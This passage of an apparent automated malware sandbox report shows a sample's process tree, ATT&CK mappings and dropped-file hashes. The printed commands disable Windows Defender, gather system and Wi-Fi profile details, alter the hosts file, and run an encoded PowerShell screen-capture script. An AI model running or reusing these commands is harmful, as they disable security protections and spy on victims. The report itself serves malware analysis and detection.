    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5620
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5804
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:5868
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5908
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5996
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    PID:6044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6124
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ysgnscgh\ysgnscgh.cmdline"
      4⤵
      PID:5140
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7995.tmp" "c:\Users\Admin\AppData\Local\Temp\ysgnscgh\CSCFA2B7E89152E45E6B899C7115F6417E.TMP"
        5⤵
        
        PID:5276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
537815e7cc5c694912ac0308147852e4

SHA1
2ccdd9d9dc637db5462fe8119c0df261146c363c

SHA256
b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f

SHA512
63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8b167567021ccb1a9fdf073fa9112ef0

SHA1
3baf293fbfaa7c1e7cdacb5f2975737f4ef69898

SHA256
26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513

SHA512
726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
4a609a30076749950f0bb3a321d440c1

SHA1
128022fe52db92488e5fbf26ddb55d647c10d218

SHA256
6cc938bca6271236f2adcfb1168f3f6a5a81310f0c92a9a3a5772eca0be5eca7

SHA512
9eaaf4d0b03756dd6b28a84f960a1fe198b785f22740e7078621f392f8e83b5a994b0584dcdbcf6661d33ae56e3c128ec4948aa7747b72ce094c1c08e6c74667

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d1757625c4981a09965145ba88de2987

SHA1
defe18c719ddea4847eb8f347a6140998f6c3526

SHA256
e0fa8354f44bf7272b7c192407da2dea38ad564de76f6ddf5ed3670a20e66c56

SHA512
f33b2debffc965de04e77c00da4a24ce711e8fa0a632fcadf947ce04630153a4827a2702821f8e5661f415bf579587fac2f8a6e68b692d68e39e03e81909767c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
4e9144d6c5a6402eef4b00064f8ce164

SHA1
ae7ecda89b3d6c5fc69ce2871d576b0755c67224

SHA256
cb19e4aaf386e157029b53229124ba17e9fc1ecb60f27014909f01a83e4f6095

SHA512
8dab36fb202ba430f060ccc07b1b8e98953eca607829f89bc138262e874cd1c4ed7055198e966fcc1417956097b91d25332b2c0e9299a19aaca3c5315c5ea756

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c574989f72fee2ae27f5b99e93e1eff9

SHA1
b5222948cbce23d788bef9b558a8b344b8486f0b

SHA256
0bb777dabefe5c511d8f24711bffabe40f4ba7339a253cfa299110d5bcf48bcf

SHA512
f3eca9330634fbc886ff62973cf9d707a50072e4d468bf63bb8ed9b3778cc0c77bc1b25bc79d3cc108cc6e42802a8cc61f03d385703509be71d4d07d08e37b9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4fc1ceefa94c82f73b7ee478e2920ea3

SHA1
17a031c8d10e316478d85d24ba8a8b5ebfda3149

SHA256
018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb

SHA512
cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7995.tmp

Filesize
1KB

MD5
fb21ad6db50dfee27bfdb758028cb95a

SHA1
c8c32e39398484ecbc5682a289f7f9f6005ada56

SHA256
9e72d833a941eb2a5e1e1679086da11b8370c992fc56930dcc9816d4b846c85d

SHA512
3ee2c2f495d1bec2f3532d5a659e86d775d013a62dae9b98f9aed8e9d2c390c39c1415279240e3e66acc1d12afe142bd7e592a1c57bbc1f5bf18efc9acf14ccf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zz47UJlIFG\Display (1).png

Filesize
42KB

MD5
45dccd2997e6604ee3650984f7af5cc3

SHA1
d3d80e07316df8671083503719657ace01f35236

SHA256
f7c9e4216848253d33af4d280874a023a38b0cbc7e2e752c3aa25e9642063f16

SHA512
25ca8a009194c0e002673333fcf1df699fa6821d5f96f792ac7437a325f65495930062ab69e170a16b8b9d0453642a8b7b084a026ce54ea44786985a10161298

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hybx03rv.wnt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysgnscgh\ysgnscgh.dll

Filesize
4KB

MD5
03631837987f6543e248741c2142f2b4

SHA1
2cab3ca61510144ad29dc8a29a0650abc6a91c10

SHA256
d583fad56cbd63eddb0521a75c19efc7785879379e43b5f95079b1c12e18bf50

SHA512
9f193042fa8eb08bbca48608380b4dd0dbba40cbff3e1d76024db277ae0fee599eb73f80f0cf2c00c21207e86236681b3de496aae2834540eebbd00dcfd39bdb

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 18658.crdownload

Filesize
9.5MB

MD5
367043efec4418f765ab8cf9446e53f8

SHA1
cdb54eb3dd5adbffb99393387a6358f317efe430

SHA256
fe74586fe43f92eceff006301acd1d792c31c3378d92a62cb4de62e8ae4fdfae

SHA512
49d05a178377c71e6d533ab74aef4bd9a8b2af2223b33391aaee5d23687cd8a524000d6df02f92b93b1c5c3a3d2699ce45d4be048fabaad121bde7a0fbcc91c1

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ysgnscgh\CSCFA2B7E89152E45E6B899C7115F6417E.TMP

Filesize
652B

MD5
5cfea262476cc7842dac526b0b5f24e1

SHA1
e6a232e9dcd27cce9e8b9f2441b15bb6816f4c98

SHA256
5dce5fc5ff2d54c6536f50212e3aa16fddb3ebc2b0df54939a8e8b502f38517c

SHA512
f354309f3769f88ed4c0121c1a8a80385e1f4fa9d902074f16b1f7c0e108602c4d5756d6777440af6cdf88b8e32573e4cf0229f9dcd778f16d13d932c5f4b8a9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ysgnscgh\ysgnscgh.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ysgnscgh\ysgnscgh.cmdline

Filesize
607B

MD5
afbbbb909d99a1faef99a992ae46ee2b

SHA1
34dd26866327cd4e5bf42d4caef7cef07b9e3083

SHA256
a47f753a624fcea8b6535a55a729ea5904108cfb983b44efb8f30fff4c28ac6e

SHA512
9104288aff89b93b778ae90389e9429c8711769ded4f97996c5e82e95aeb48b38ef33ea3398e4cc6b66a0c35f54f3dc664b3b648d9dcee07593518e6815c8f56

Download Submit
memory/5312-92-0x0000020C39310000-0x0000020C39332000-memory.dmp

Filesize
136KB

Download
memory/6124-137-0x0000014653440000-0x0000014653448000-memory.dmp

Filesize
32KB

Download